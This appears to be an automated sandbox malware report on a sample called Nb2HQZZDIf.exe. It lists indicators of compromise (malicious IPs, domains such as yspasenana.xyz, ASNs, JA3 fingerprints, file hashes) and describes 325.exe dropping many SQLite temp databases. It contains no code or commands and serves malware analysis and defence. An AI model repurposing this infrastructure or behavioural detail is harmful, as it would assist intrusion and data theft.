skypedataprdcolwus15.cloudapp.net Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing disassembly code. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
11:42:57	API Interceptor	1x Sleep call for process: kS2dqbsDwD.exe modified
11:44:07	API Interceptor	46x Sleep call for process: 325.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
212.224.105.105	Nb2HQZZDIf.exe	Get hash	malicious	Browse	yspasenana.xyz/
104.192.141.1	Nb2HQZZDIf.exe	Get hash	malicious	Browse
	r3xwkKS58W.exe	Get hash	malicious	Browse
	P58w6OezJY.exe	Get hash	malicious	Browse
	lpaBPnb1OB.exe	Get hash	malicious	Browse
	2aJ9QdIdFE.exe	Get hash	malicious	Browse
	EA4LughYnY.exe	Get hash	malicious	Browse
	etSPaoVcAD.exe	Get hash	malicious	Browse
	kxQkjkU9DO.exe	Get hash	malicious	Browse
	9CMjcYFBxo.exe	Get hash	malicious	Browse
	JvlwIeO09R.exe	Get hash	malicious	Browse
	pEIro35JRJ.exe	Get hash	malicious	Browse
	AEdU8eJHgN.exe	Get hash	malicious	Browse
	YIrI3VuV0W.exe	Get hash	malicious	Browse
	8zsiEeSTzI.exe	Get hash	malicious	Browse
	k6sy0WOByI.exe	Get hash	malicious	Browse
	kvAgGyJqYT.exe	Get hash	malicious	Browse
	A7DmPhc0bs.exe	Get hash	malicious	Browse
	Coupon-Codes-2021.doc	Get hash	malicious	Browse
	k53f1UmAkl.exe	Get hash	malicious	Browse
	q7jxy6gZMb.exe	Get hash	malicious	Browse
104.25.234.53	Pdf Document.exe	Get hash	malicious	Browse	is.gd/TGKGYYYYZ

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
bitbucket.org	Nb2HQZZDIf.exe	Get hash	malicious	Browse	104.192.141.1
	HryPYPQtcg.exe	Get hash	malicious	Browse	104.192.141.1
	oOoVvuAQS9.exe	Get hash	malicious	Browse	104.192.141.1
	6FORhr7lC1.exe	Get hash	malicious	Browse	104.192.141.1
	2aJ9QdIdFE.exe	Get hash	malicious	Browse	104.192.141.1
	EA4LughYnY.exe	Get hash	malicious	Browse	104.192.141.1
	etSPaoVcAD.exe	Get hash	malicious	Browse	104.192.141.1
	kxQkjkU9DO.exe	Get hash	malicious	Browse	104.192.141.1
	9CMjcYFBxo.exe	Get hash	malicious	Browse	104.192.141.1
	JvlwIeO09R.exe	Get hash	malicious	Browse	104.192.141.1
	pEIro35JRJ.exe	Get hash	malicious	Browse	104.192.141.1
	AEdU8eJHgN.exe	Get hash	malicious	Browse	104.192.141.1
	YIrI3VuV0W.exe	Get hash	malicious	Browse	104.192.141.1
	8zsiEeSTzI.exe	Get hash	malicious	Browse	104.192.141.1
	k6sy0WOByI.exe	Get hash	malicious	Browse	104.192.141.1
	kvAgGyJqYT.exe	Get hash	malicious	Browse	104.192.141.1
	I2VQzf34i3.exe	Get hash	malicious	Browse	104.192.141.1
	A7DmPhc0bs.exe	Get hash	malicious	Browse	104.192.141.1
	Coupon-Codes-2021.doc	Get hash	malicious	Browse	104.192.141.1
	k53f1UmAkl.exe	Get hash	malicious	Browse	104.192.141.1
yspasenana.xyz	Nb2HQZZDIf.exe	Get hash	malicious	Browse	212.224.105.105
s3-w.us-east-1.amazonaws.com	Nb2HQZZDIf.exe	Get hash	malicious	Browse	52.216.94.27
	Machine Service.xlsx	Get hash	malicious	Browse	52.216.249.124
	Machine Service.xlsx	Get hash	malicious	Browse	52.217.102.108
	#Ud83d#Udd0ajs_msg_ 3pm.html	Get hash	malicious	Browse	52.217.11.68
	HryPYPQtcg.exe	Get hash	malicious	Browse	52.217.129.57
	6FORhr7lC1.exe	Get hash	malicious	Browse	52.217.202.41
	2aJ9QdIdFE.exe	Get hash	malicious	Browse	52.217.162.201
	EA4LughYnY.exe	Get hash	malicious	Browse	52.217.161.9
	etSPaoVcAD.exe	Get hash	malicious	Browse	52.217.80.164
	kxQkjkU9DO.exe	Get hash	malicious	Browse	52.216.128.43
	9CMjcYFBxo.exe	Get hash	malicious	Browse	52.216.137.244
	JvlwIeO09R.exe	Get hash	malicious	Browse	52.217.130.249
	pEIro35JRJ.exe	Get hash	malicious	Browse	52.217.104.164
	AEdU8eJHgN.exe	Get hash	malicious	Browse	52.217.90.84
	YIrI3VuV0W.exe	Get hash	malicious	Browse	52.216.171.179
	8zsiEeSTzI.exe	Get hash	malicious	Browse	52.217.140.209
	k6sy0WOByI.exe	Get hash	malicious	Browse	52.217.101.132
	I2VQzf34i3.exe	Get hash	malicious	Browse	52.217.83.220
	k53f1UmAkl.exe	Get hash	malicious	Browse	52.217.10.252
	D1E3656B4E1C609B2540CFF74F59319A52D7FABF4CC51.exe	Get hash	malicious	Browse	52.217.164.225

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	Nb2HQZZDIf.exe	Get hash	malicious	Browse	104.25.233.53
	SgjcpodWpB.exe	Get hash	malicious	Browse	104.21.14.85
	#U00e2_#U00e2_Play _to _Listen.htm	Get hash	malicious	Browse	104.21.72.95
	10303640_APMC-TRN-C0001-Stability_Calculation_Rev1.exe	Get hash	malicious	Browse	104.18.7.156
	r3xwkKS58W.exe	Get hash	malicious	Browse	104.21.51.99
	Westernunionreceipt711 ___vaw.html	Get hash	malicious	Browse	104.21.40.98
	MPU702734-pdf.exe	Get hash	malicious	Browse	104.21.13.164
	XuQRPW44hi	Get hash	malicious	Browse	104.21.58.112
	Remittance.html	Get hash	malicious	Browse	104.16.18.94
	jRPSjUSf.exe	Get hash	malicious	Browse	104.23.98.190
	989E2813477A4245E0357E0F8E49AFAE384AF828C95EE.exe	Get hash	malicious	Browse	104.21.71.170
	P58w6OezJY.exe	Get hash	malicious	Browse	104.25.234.53
	ruoMVmVwPu.exe	Get hash	malicious	Browse	172.67.130.27
	4QKHQR82Xt.exe	Get hash	malicious	Browse	162.159.134.233
	rxfttQnoO5	Get hash	malicious	Browse	1.13.147.24
	#U2706_#U260e_Play _to _Listen.htm	Get hash	malicious	Browse	104.21.72.95
	Cotizaci#U00f3n.pdf.exe	Get hash	malicious	Browse	104.21.36.131
	aviso de pago.pdf.exe	Get hash	malicious	Browse	104.21.39.75
	GHK2s5apNB.exe	Get hash	malicious	Browse	172.67.130.27
	kRGc0HgN5b.exe	Get hash	malicious	Browse	172.67.188.154
DE-FIRSTCOLOwwwfirst-colonetDE	Nb2HQZZDIf.exe	Get hash	malicious	Browse	212.224.105.105
	SgjcpodWpB.exe	Get hash	malicious	Browse	212.224.105.79
	Px9H2c5Uo4.exe	Get hash	malicious	Browse	212.224.105.80
	eBjKjtQjDN.exe	Get hash	malicious	Browse	212.224.105.115
	ruoMVmVwPu.exe	Get hash	malicious	Browse	212.224.105.79
	GHK2s5apNB.exe	Get hash	malicious	Browse	212.224.105.79
	m8TJbe5yP6.exe	Get hash	malicious	Browse	212.224.105.79
	SecuriteInfo.com.Trojan.Win32.Save.a.312.exe	Get hash	malicious	Browse	212.224.105.79
	SecuriteInfo.com.Variant.Cerbu.108262.10538.exe	Get hash	malicious	Browse	212.224.105.79
	d9MvOgFpyI.exe	Get hash	malicious	Browse	212.224.105.115
	0832946463ff710ff7f783ce24756f455a843852b0b96.exe	Get hash	malicious	Browse	212.224.105.115
	Order 161488.xlsb	Get hash	malicious	Browse	212.224.124.82
	Order 161488.xlsb	Get hash	malicious	Browse	212.224.124.82
	Order 46975986.xlsb	Get hash	malicious	Browse	212.224.124.82
	PO 97179275.xlsb	Get hash	malicious	Browse	212.224.124.82
	Order 46975986.xlsb	Get hash	malicious	Browse	212.224.124.82
	PO 97179275.xlsb	Get hash	malicious	Browse	212.224.124.82
	what_is_a_xydhias_agreement.js	Get hash	malicious	Browse	37.17.224.94
	what_is_a_xydhias_agreement.js	Get hash	malicious	Browse	37.17.224.94
	no_response_will_be_considered_as_agreement_email.js	Get hash	malicious	Browse	37.17.224.94
AMAZON-02US	Nb2HQZZDIf.exe	Get hash	malicious	Browse	52.216.94.27
	ovLjmo5UoE	Get hash	malicious	Browse	63.34.62.30
	o3ZUDIEL1v	Get hash	malicious	Browse	18.151.13.78
	D1dU3jQ1II	Get hash	malicious	Browse	34.208.242.240
	mal.exe	Get hash	malicious	Browse	52.58.78.16
	vjsBNwolo9.js	Get hash	malicious	Browse	76.223.26.96
	r3xwkKS58W.exe	Get hash	malicious	Browse	52.217.135.113
	A7X93JRxhp	Get hash	malicious	Browse	54.151.74.14
	1Ds9g7CEsp	Get hash	malicious	Browse	13.208.189.104
	XuQRPW44hi	Get hash	malicious	Browse	54.228.23.118
	Taf5zLti30	Get hash	malicious	Browse	44.231.84.110
	5qpsqg7U0G	Get hash	malicious	Browse	34.219.219.82
	LyxN1ckWTW	Get hash	malicious	Browse	18.139.244.68
	ZlvFNj.dll	Get hash	malicious	Browse	3.16.22.120
	U4r9W64doy	Get hash	malicious	Browse	13.245.89.196
	C4PozjQdGE	Get hash	malicious	Browse	18.135.214.121
	kb5IbEJU8c	Get hash	malicious	Browse	18.227.43.189
	MD5OxTSc6i	Get hash	malicious	Browse	18.149.163.217
	P58w6OezJY.exe	Get hash	malicious	Browse	52.217.198.209
	c51w5YSYdO	Get hash	malicious	Browse	108.146.155.164

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	Nb2HQZZDIf.exe	Get hash	malicious	Browse	104.192.141.1 52.217.201.169 104.25.234.53 88.99.66.31
	#U00e2_#U00e2_Play _to _Listen.htm	Get hash	malicious	Browse	104.192.141.1 52.217.201.169 104.25.234.53 88.99.66.31
	41609787.exe	Get hash	malicious	Browse	104.192.141.1 52.217.201.169 104.25.234.53 88.99.66.31
	B5xK9XEvzO.exe	Get hash	malicious	Browse	104.192.141.1 52.217.201.169 104.25.234.53 88.99.66.31
	RsEvjI1iTt.exe	Get hash	malicious	Browse	104.192.141.1 52.217.201.169 104.25.234.53 88.99.66.31
	ORD.ppt	Get hash	malicious	Browse	104.192.141.1 52.217.201.169 104.25.234.53 88.99.66.31
	39pfFwU3Ns.exe	Get hash	malicious	Browse	104.192.141.1 52.217.201.169 104.25.234.53 88.99.66.31
	47a8af.exe.exe	Get hash	malicious	Browse	104.192.141.1 52.217.201.169 104.25.234.53 88.99.66.31
	Comprobante1.vbs	Get hash	malicious	Browse	104.192.141.1 52.217.201.169 104.25.234.53 88.99.66.31
	ZlvFNj.dll	Get hash	malicious	Browse	104.192.141.1 52.217.201.169 104.25.234.53 88.99.66.31
	QT2kxM315B.exe	Get hash	malicious	Browse	104.192.141.1 52.217.201.169 104.25.234.53 88.99.66.31
	4QKHQR82Xt.exe	Get hash	malicious	Browse	104.192.141.1 52.217.201.169 104.25.234.53 88.99.66.31
	Convert HEX uit phishing mail.htm	Get hash	malicious	Browse	104.192.141.1 52.217.201.169 104.25.234.53 88.99.66.31
	#U2706_#U260e_Play _to _Listen.htm	Get hash	malicious	Browse	104.192.141.1 52.217.201.169 104.25.234.53 88.99.66.31
	192-3216-Us.gt.com.html	Get hash	malicious	Browse	104.192.141.1 52.217.201.169 104.25.234.53 88.99.66.31
	N41101255652.vbs	Get hash	malicious	Browse	104.192.141.1 52.217.201.169 104.25.234.53 88.99.66.31
	FILE_2932NH_9923.exe	Get hash	malicious	Browse	104.192.141.1 52.217.201.169 104.25.234.53 88.99.66.31
	RDlkHCLRxE.exe	Get hash	malicious	Browse	104.192.141.1 52.217.201.169 104.25.234.53 88.99.66.31
	#U2706_#U260e_Play _to _Listen.htm	Get hash	malicious	Browse	104.192.141.1 52.217.201.169 104.25.234.53 88.99.66.31
	Swift_Fattura_0093320128_.exe	Get hash	malicious	Browse	104.192.141.1 52.217.201.169 104.25.234.53 88.99.66.31

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
C:\Users\user\AppData\Roaming\325.exe	Nb2HQZZDIf.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Roaming\325.exe	P58w6OezJY.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\325.exe.log Download File
Process:	C:\Users\user\AppData\Roaming\325.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.355304211458859
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
MD5:	FED34146BF2F2FA59DCF8702FCC8232E
SHA1:	B03BFEA175989D989850CF06FE5E7BBF56EAA00A
SHA-256:	123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
SHA-512:	1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

C:\Users\user\AppData\Local\Temp\tmp2299.tmp Download File
Process:	C:\Users\user\AppData\Roaming\325.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6970840431455908
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
MD5:	00681D89EDDB6AD25E6F4BD2E66C61C6
SHA1:	14B2FBFB460816155190377BBC66AB5D2A15F7AB
SHA-256:	8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
SHA-512:	159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp229A.tmp Download File
Process:	C:\Users\user\AppData\Roaming\325.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6970840431455908
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
MD5:	00681D89EDDB6AD25E6F4BD2E66C61C6
SHA1:	14B2FBFB460816155190377BBC66AB5D2A15F7AB
SHA-256:	8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
SHA-512:	159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp5525.tmp Download File
Process:	C:\Users\user\AppData\Roaming\325.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp5526.tmp Download File
Process:	C:\Users\user\AppData\Roaming\325.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp5555.tmp Download File
Process:	C:\Users\user\AppData\Roaming\325.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp5556.tmp Download File
Process:	C:\Users\user\AppData\Roaming\325.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp5557.tmp Download File
Process:	C:\Users\user\AppData\Roaming\325.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp5558.tmp Download File
Process:	C:\Users\user\AppData\Roaming\325.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp5588.tmp Download File
Process:	C:\Users\user\AppData\Roaming\325.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp8757.tmp Download File
Process:	C:\Users\user\AppData\Roaming\325.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp8758.tmp Download File
Process:	C:\Users\user\AppData\Roaming\325.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp8759.tmp Download File
Process:	C:\Users\user\AppData\Roaming\325.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpBA03.tmp Download File
Process:	C:\Users\user\AppData\Roaming\325.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpBC57.tmp Download File
Process:	C:\Users\user\AppData\Roaming\325.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpBC58.tmp Download File
Process:	C:\Users\user\AppData\Roaming\325.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
